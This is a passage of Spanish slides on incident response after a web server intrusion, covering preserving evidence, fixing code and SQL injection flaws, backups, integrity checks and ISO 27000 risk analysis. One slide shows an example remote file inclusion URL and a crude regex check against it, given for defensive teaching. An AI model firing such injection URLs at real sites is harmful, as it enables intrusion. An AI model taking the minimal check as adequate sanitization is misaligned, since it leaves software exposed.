4. Que hacer Ver por donde... Sin reiniciar, NI apagar el servidor. Útil tener logs del servidor, información de trafico red, histórico comandos, cualquier cosa..... Que hayan dejado Tras identificar por donde, ver el como resolver o evitar la intrusión (aka minimizar) Restaurar copia seguridad
5. Que hacer Ftp, correo, cambio password Solventar fallo aplicación, Inyección codigo (htm, php, asp), o de Sql... Intentar sanear valores de variables. http://loco.com/index.php?zone=http://injeccion.com if(eregi(“ ^http ”,$zone.var)) then ….. ¿Actualizar sistema....? ¿Aplicaciones...?
6. Que habia que haber hecho Backups, backups y backups ¿Comprimir..., cintas...? ¿Un día....? Ficheros, bases de datos…. Política recurrente... “hasta el infinito y mas alla” Hay mejores alternativas... ¿snapshots, filesystems…?
7. Que habia que haber hecho Validación integridad backups ¿Que es eso? Numero de veces al año… ( según periodicidad ) Entorno test o desarrollo, NUNCA en producción
8. Que habia que haber hecho Realizar análisis riesgos. LOPD, SGSI (aka iso-27000) ….. Securizacion servidor, servicios y aplicaciones Logs hacia servidor interno no accesible
9.
10. Preguntas…. Gracias a todos por vuestro tiempo e interes . Julio García [email_address]